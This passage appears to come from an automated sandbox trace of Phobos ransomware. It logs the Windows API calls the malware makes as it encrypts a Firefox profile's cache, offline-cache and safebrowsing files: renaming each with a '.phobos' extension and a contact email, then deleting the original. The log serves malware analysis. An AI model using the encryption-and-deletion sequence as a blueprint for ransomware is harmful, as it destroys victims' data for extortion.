halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.803] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.803] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8266, lpOverlapped=0x0) returned 1 [0193.972] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8270, dwBufLen=0x8270 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8270) returned 1 [0193.972] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8270, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8270, lpOverlapped=0x0) returned 1 [0193.974] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0193.974] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.974] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.974] CryptDestroyKey (hKey=0xa32a28) returned 1 [0193.974] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.974] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.974] CloseHandle (hObject=0x14c) returned 1 [0193.974] CloseHandle (hObject=0x12c) returned 1 [0193.974] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01")) returned 1 [0193.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.976] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4194304) returned 1 [0193.976] CloseHandle (hObject=0x12c) returned 1 [0193.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_")) returned 0x2020 [0193.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0193.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.977] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0193.977] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0193.977] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0194.146] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0194.146] ReadFile (in: hFile=0x12c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0194.149] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0194.149] ReadFile (in: hFile=0x12c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0194.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa327e8) returned 1 [0194.154] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.154] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0194.162] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.162] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0194.162] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0194.529] SetEndOfFile (hFile=0x12c) returned 1 [0194.530] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0194.530] WriteFile (in: hFile=0x12c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0194.531] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0194.531] WriteFile (in: hFile=0x12c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0194.533] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0194.533] WriteFile (in: hFile=0x12c, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0194.534] CloseHandle (hObject=0x12c) returned 1 [0194.534] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.539] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8468) returned 1 [0194.539] CloseHandle (hObject=0x178) returned 1 [0194.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_")) returned 0x2020 [0194.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.539] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.539] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.540] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0194.540] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.540] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2114, lpOverlapped=0x0) returned 1 [0194.627] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2120, dwBufLen=0x2120 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2120) returned 1 [0194.627] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2120, lpOverlapped=0x0) returned 1 [0194.628] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0194.628] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.628] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0194.628] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.628] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0194.628] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.628] CloseHandle (hObject=0x178) returned 1 [0194.628] CloseHandle (hObject=0x194) returned 1 [0194.628] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_")) returned 1 [0194.629] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.630] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262144) returned 1 [0194.630] CloseHandle (hObject=0x194) returned 1 [0194.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite")) returned 0x2020 [0194.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.630] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.630] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.631] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0194.631] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.631] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x40000, lpOverlapped=0x0) returned 1 [0194.802] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40010, dwBufLen=0x40010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40010) returned 1 [0194.804] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x40010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x40010, lpOverlapped=0x0) returned 1 [0194.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0194.808] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.808] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0194.808] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.808] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0194.808] CryptDestroyKey (hKey=0xa32d28) returned 1 [0194.808] CloseHandle (hObject=0x194) returned 1 [0194.808] CloseHandle (hObject=0x178) returned 1 [0194.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite")) returned 1 [0194.810] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.905] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=44) returned 1 [0194.906] CloseHandle (hObject=0x14c) returned 1 [0194.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache")) returned 0x2020 [0194.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.906] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.906] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.953] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.953] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.953] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2c, lpOverlapped=0x0) returned 1 [0194.954] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0194.954] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x30, lpOverlapped=0x0) returned 1 [0194.955] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.955] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.955] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0194.955] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.955] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0194.955] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.955] CloseHandle (hObject=0x14c) returned 1 [0194.955] CloseHandle (hObject=0x154) returned 1 [0194.955] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache")) returned 1 [0194.956] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 